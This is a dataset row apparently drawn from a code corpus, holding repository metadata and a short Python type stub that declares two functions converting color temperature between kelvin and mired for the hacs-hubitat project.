] | permissive | Phara0h/hacs-hubitat | 1dc7ef978d5c552ab930992e00a6ae6d1a01a102 | e87107490c0d7004e3b9f1296a372b8a280aabec | refs/heads/master | 2022-12-08T18:33:28.854871 | 2020-09-18T22:40:29 | 2020-09-18T22:40:29 | 296,737,546 | 0 | 0 | MIT | 2020-09-18T21:57:26 | 2020-09-18T21:57:25 | null | UTF-8 | Python | false | false | 123 | pyi | def color_temperature_kelvin_to_mired(temp: int) -> int: ...
def color_temperature_mired_to_kelvin(mired: int) -> int: ...
| [
"jason@jasoncheatham.com"
] | jason@jasoncheatham.com |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.